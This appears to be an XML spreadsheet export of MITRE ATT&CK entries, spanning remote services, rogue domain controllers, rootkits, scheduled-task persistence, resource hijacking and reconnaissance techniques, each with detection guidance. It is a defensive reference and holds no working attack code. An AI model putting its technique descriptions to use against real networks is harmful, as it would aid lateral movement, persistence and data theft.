Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/002</t>
  </si>
  <si>
    <t>Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>Remote Services: SSH</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.(Citation: SSH Secure Shell)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/004</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>Remote Services: VNC</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). The adversary may then perform actions as the logged-on user.
VNC is a desktop sharing system that allows users to remotely control another computer’s display by relaying mouse and keyboard inputs over the network. VNC does not necessarily use standard user credentials. Instead, a VNC client and server may be configured with sets of credentials that are used only for VNC connections.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/005</t>
  </si>
  <si>
    <t>Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.</t>
  </si>
  <si>
    <t>T1021.006</t>
  </si>
  <si>
    <t>Remote Services: Windows Remote Management</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/006</t>
  </si>
  <si>
    <t>Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement)</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or &lt;code&gt;net view&lt;/code&gt; using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt; or &lt;code&gt;/etc/hosts&lt;/code&gt;) in order to discover the hostname to IP address mappings of remote systems. 
Specific to macOS, the &lt;code&gt;bonjour&lt;/code&gt; protocol exists to discover additional Mac-based systems within the same broadcast domain.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1018</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</si>
  <si>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Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used.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Monitor for processes that can be used to discover remote systems, such as &lt;code&gt;ping.exe&lt;/code&gt; and &lt;code&gt;tracert.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic; RedHuntLabs, @redhuntlabs</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>Replication Through Removable Media</t>
  </si>
  <si>
    <t>Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1091</t>
  </si>
  <si>
    <t>Initial Access, Lateral Movement</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.</t>
  </si>
  <si>
    <t>Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. 
One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1496</t>
  </si>
  <si>
    <t>Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Jay Chen, Palo Alto Networks; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1207</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)
Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Network Traffic: Network Traffic Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) 
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1014</t>
  </si>
  <si>
    <t>Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)</t>
  </si>
  <si>
    <t>Drive: Drive Modification, Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Application control by file name or path, File monitoring, Host intrusion prevention systems, Signature-based detection, System access controls</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>Scheduled Task/Job</t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053</t>
  </si>
  <si>
    <t>Execution, Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>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</si>
  <si>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Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>Alain Homewood, Insomnia Security; Leo Loobeek, @leoloobeek; Prashant Verma, Paladion; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1053.001</t>
  </si>
  <si>
    <t>Scheduled Task/Job: At (Linux)</t>
  </si>
  <si>
    <t>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)
An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/001</t>
  </si>
  <si>
    <t>03 December 2019</t>
  </si>
  <si>
    <t>Monitor scheduled task creation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t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>Scheduled Task/Job: At (Windows)</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;at.exe&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. 
An adversary may use &lt;code&gt;at.exe&lt;/code&gt; in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).
Note: The &lt;code&gt;at.exe&lt;/code&gt; command line utility has been deprecated in current versions of Windows in favor of &lt;code&gt;schtasks&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/002</t>
  </si>
  <si>
    <t>27 November 2019</t>
  </si>
  <si>
    <t>Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe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Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1053.007</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Container Orchestration Job</t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in the cluster.(Citation: Threat Matrix for Kubernetes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/007</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. </t>
  </si>
  <si>
    <t>Container: Container Creation, File: File Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1053.003</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Cron</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;cron&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code. The &lt;code&gt;cron&lt;/code&gt; utility is a time-based job scheduler for Unix-like operating systems.  The &lt;code&gt; crontab&lt;/code&gt; file contains the schedule of cron entries to be run and the specified times for execution. Any &lt;code&gt;crontab&lt;/code&gt; files are stored in operating system-specific file paths.
An adversary may use &lt;code&gt;cron&lt;/code&gt; in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. &lt;code&gt;cron&lt;/code&gt; can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/003</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.  
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. </t>
  </si>
  <si>
    <t>T1053.004</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Launchd</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;Launchd&lt;/code&gt; daemon to perform task scheduling for initial or recurring execution of malicious code. The &lt;code&gt;launchd&lt;/code&gt; daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchDaemons&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).
An adversary may use the &lt;code&gt;launchd&lt;/code&gt; daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. &lt;code&gt;launchd&lt;/code&gt; can also be abused to run a process under the context of a specified account. Daemons, such as &lt;code&gt;launchd&lt;/code&gt;, run with the permissions of the root user account, and will operate regardless of which user account is logged in.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/004</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Scheduled Task</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The &lt;code&gt;schtasks&lt;/code&gt; can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though &lt;code&gt;at.exe&lt;/code&gt; can not access tasks created with &lt;code&gt;schtasks&lt;/code&gt; or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/005</t>
  </si>
  <si>
    <t>30 December 2020</t>
  </si>
  <si>
    <t>Monitor process execution from the &lt;code&gt;svchost.exe&lt;/code&gt; in Windows 10 and the Windows Task Scheduler &lt;code&gt;taskeng.exe&lt;/code&gt; for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>T1053.006</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Systemd Timers</t>
  </si>
  <si>
    <t>Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension &lt;code&gt;.timer&lt;/code&gt; that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)
Each &lt;code&gt;.timer&lt;/code&gt; file must have a corresponding &lt;code&gt;.service&lt;/code&gt; file with the same name, e.g., &lt;code&gt;example.timer&lt;/code&gt; and &lt;code&gt;example.service&lt;/code&gt;. &lt;code&gt;.service&lt;/code&gt; files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to &lt;code&gt;/etc/systemd/system/&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; while user level are written to &lt;code&gt;~/.config/systemd/user/&lt;/code&gt;.
An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/006</t>
  </si>
  <si>
    <t>Systemd timer unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: &lt;code&gt;systemctl list-timers –all&lt;/code&gt;. Analyze the contents of corresponding &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)</t>
  </si>
  <si>
    <t>SarathKumar Rajendran, Trimble Inc</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1029</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as &lt;code&gt;CopyFromScreen&lt;/code&gt;, &lt;code&gt;xwd&lt;/code&gt;, or &lt;code&gt;screencapture&lt;/code&gt;.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1113</t>
  </si>
  <si>
    <t>Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.</t>
  </si>
  <si>
    <t>T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</t>
  </si>
  <si>
    <t>Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed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</si>
  <si>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t>
  </si>
  <si>
    <t>T1597.002</t>
  </si>
  <si>
    <t>Search Closed Sources: Purchase Technical Data</t>
  </si>
  <si>
    <t>Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)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[Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597/002</t>
  </si>
  <si>
    <t>T1597.001</t>
  </si>
  <si>
    <t>Search Closed Sources: Threat Intel Vendors</t>
  </si>
  <si>
    <t>Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597/001</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)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</si>
  <si>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t>
  </si>
  <si>
    <t>T1596.004</t>
  </si>
  <si>
    <t>Search Open Technical Databases: CDNs</t>
  </si>
  <si>
    <t>Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/004</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
